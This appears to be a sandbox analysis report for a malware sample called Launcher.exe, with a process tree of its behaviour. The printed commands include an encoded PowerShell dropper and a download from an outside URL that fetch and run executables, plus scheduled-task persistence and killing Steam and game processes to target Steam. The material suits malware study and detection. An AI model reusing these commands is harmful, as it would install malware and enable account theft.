SeTakeOwnershipPrivilege 880 msiexec.exe Token: SeRestorePrivilege 880 msiexec.exe Token: SeTakeOwnershipPrivilege 880 msiexec.exe Token: SeRestorePrivilege 880 msiexec.exe Token: SeTakeOwnershipPrivilege 880 msiexec.exe Token: SeRestorePrivilege 880 msiexec.exe Token: SeTakeOwnershipPrivilege 880 msiexec.exe Token: SeDebugPrivilege 2816 tasklist.exe Token: SeAssignPrimaryTokenPrivilege 1616 svchost.exe Token: SeIncreaseQuotaPrivilege 1616 svchost.exe Token: SeSecurityPrivilege 1616 svchost.exe Token: SeTakeOwnershipPrivilege 1616 svchost.exe Token: SeLoadDriverPrivilege 1616 svchost.exe Token: SeSystemtimePrivilege 1616 svchost.exe Token: SeBackupPrivilege 1616 svchost.exe -
Suspicious use of FindShellTrayWindow 12 IoCs
Processes:
Explorer.EXEpid process 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE 3508 Explorer.EXE -
Suspicious use of UnmapMainImage 4 IoCs
Processes:
Explorer.EXERuntimeBroker.exeRuntimeBroker.exepid process 3508 Explorer.EXE 4060 RuntimeBroker.exe 464 RuntimeBroker.exe 464 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Launcher.exepowershell.exea4t42sbh.v230.exea4t42sbh.v233.execmd.execmd.execmd.execmd.exea4t42sbh.v231.execmd.exea4t42sbh.v232.exedialer.exedescription pid process target process PID 5036 wrote to memory of 4380 5036 Launcher.exe powershell.exe PID 5036 wrote to memory of 4380 5036 Launcher.exe powershell.exe PID 4380 wrote to memory of 4392 4380 powershell.exe a4t42sbh.v230.exe PID 4380 wrote to memory of 4392 4380 powershell.exe a4t42sbh.v230.exe PID 4380 wrote to memory of 4392 4380 powershell.exe a4t42sbh.v230.exe PID 4380 wrote to memory of 2116 4380 powershell.exe a4t42sbh.v231.exe PID 4380 wrote to memory of 2116 4380 powershell.exe a4t42sbh.v231.exe PID 4380 wrote to memory of 2116 4380 powershell.exe a4t42sbh.v231.exe PID 4380 wrote to memory of 4400 4380 powershell.exe a4t42sbh.v232.exe PID 4380 wrote to memory of 4400 4380 powershell.exe a4t42sbh.v232.exe PID 4380 wrote to memory of 2456 4380 powershell.exe a4t42sbh.v233.exe PID 4380 wrote to memory of 2456 4380 powershell.exe a4t42sbh.v233.exe PID 4380 wrote to memory of 2456 4380 powershell.exe a4t42sbh.v233.exe PID 4392 wrote to memory of 1244 4392 a4t42sbh.v230.exe cmd.exe PID 4392 wrote to memory of 1244 4392 a4t42sbh.v230.exe cmd.exe PID 2456 wrote to memory of 1932 2456 a4t42sbh.v233.exe cmd.exe PID 2456 wrote to memory of 1932 2456 a4t42sbh.v233.exe cmd.exe PID 1244 wrote to memory of 2184 1244 cmd.exe chcp.com PID 1244 wrote to memory of 2184 1244 cmd.exe chcp.com PID 1932 wrote to memory of 4356 1932 cmd.exe where.exe PID 1932 wrote to memory of 4356 1932 cmd.exe where.exe PID 1244 wrote to memory of 1956 1244 cmd.exe findstr.exe PID 1244 wrote to memory of 1956 1244 cmd.exe findstr.exe PID 1932 wrote to memory of 2284 1932 cmd.exe powershell.exe PID 1932 wrote to memory of 2284 1932 cmd.exe powershell.exe PID 1244 wrote to memory of 4876 1244 cmd.exe findstr.exe PID 1244 wrote to memory of 4876 1244 cmd.exe findstr.exe PID 1244 wrote to memory of 2428 1244 cmd.exe findstr.exe PID 1244 wrote to memory of 2428 1244 cmd.exe findstr.exe PID 1244 wrote to memory of 3572 1244 cmd.exe schtasks.exe PID 1244 wrote to memory of 3572 1244 cmd.exe schtasks.exe PID 1244 wrote to memory of 4868 1244 cmd.exe schtasks.exe PID 1244 wrote to memory of 4868 1244 cmd.exe schtasks.exe PID 1244 wrote to memory of 1496 1244 cmd.exe cmd.exe PID 1244 wrote to memory of 1496 1244 cmd.exe cmd.exe PID 1496 wrote to memory of 2948 1496 cmd.exe reg.exe PID 1496 wrote to memory of 2948 1496 cmd.exe reg.exe PID 1244 wrote to memory of 2172 1244 cmd.exe cmd.exe PID 1244 wrote to memory of 2172 1244 cmd.exe cmd.exe PID 2172 wrote to memory of 4172 2172 cmd.exe reg.exe PID 2172 wrote to memory of 4172 2172 cmd.exe reg.exe PID 1244 wrote to memory of 776 1244 cmd.exe powershell.exe PID 1244 wrote to memory of 776 1244 cmd.exe powershell.exe PID 2116 wrote to memory of 3220 2116 a4t42sbh.v231.exe dialer.exe PID 2116 wrote to memory of 3220 2116 a4t42sbh.v231.exe dialer.exe PID 2116 wrote to memory of 3220 2116 a4t42sbh.v231.exe dialer.exe PID 2116 wrote to memory of 3220 2116 a4t42sbh.v231.exe dialer.exe PID 2116 wrote to memory of 3220 2116 a4t42sbh.v231.exe dialer.exe PID 940 wrote to memory of 2272 940 cmd.exe wusa.exe PID 940 wrote to memory of 2272 940 cmd.exe wusa.exe PID 4400 wrote to memory of 4692 4400 a4t42sbh.v232.exe dialer.exe PID 4400 wrote to memory of 4692 4400 a4t42sbh.v232.exe dialer.exe PID 4400 wrote to memory of 4692 4400 a4t42sbh.v232.exe dialer.exe PID 4400 wrote to memory of 4692 4400 a4t42sbh.v232.exe dialer.exe PID 4400 wrote to memory of 4692 4400 a4t42sbh.v232.exe dialer.exe PID 4400 wrote to memory of 4692 4400 a4t42sbh.v232.exe dialer.exe PID 4400 wrote to memory of 4692 4400 a4t42sbh.v232.exe dialer.exe PID 4692 wrote to memory of 620 4692 dialer.exe winlogon.exe PID 4692 wrote to memory of 672 4692 dialer.exe lsass.exe PID 4692 wrote to memory of 960 4692 dialer.exe svchost.exe PID 4692 wrote to memory of 384 4692 dialer.exe dwm.exe PID 4692 wrote to memory of 740 4692 dialer.exe svchost.exe PID 4692 wrote to memory of 1028 4692 dialer.exe svchost.exe PID 4692 wrote to memory of 1124 4692 dialer.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\a4t42sbh.v230.exe"C:\Users\Admin\AppData\Roaming\a4t42sbh.v230.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CF7.tmp\4CF8.tmp\4CF9.bat C:\Users\Admin\AppData\Roaming\a4t42sbh.v230.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\chcp.comchcp 12516⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "MyBatchScript"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "tf_win64.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im tf_win64.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\find.exefind /i "dota2.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im dota2.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\find.exefind /i "cs2.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cs2.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\find.exefind /i "RustClient.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RustClient.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\find.exefind /i "GTA5.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im GTA5.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\find.exefind /i "TslGame.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im TslGame.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\find.exefind /i "RainbowSix.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RainbowSix.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\timeout.exetimeout /t 36⤵
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\find.exefind /i "steam.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im steam.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\timeout.exetimeout /t 36⤵
-
C:\Windows\system32\tar.exetar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
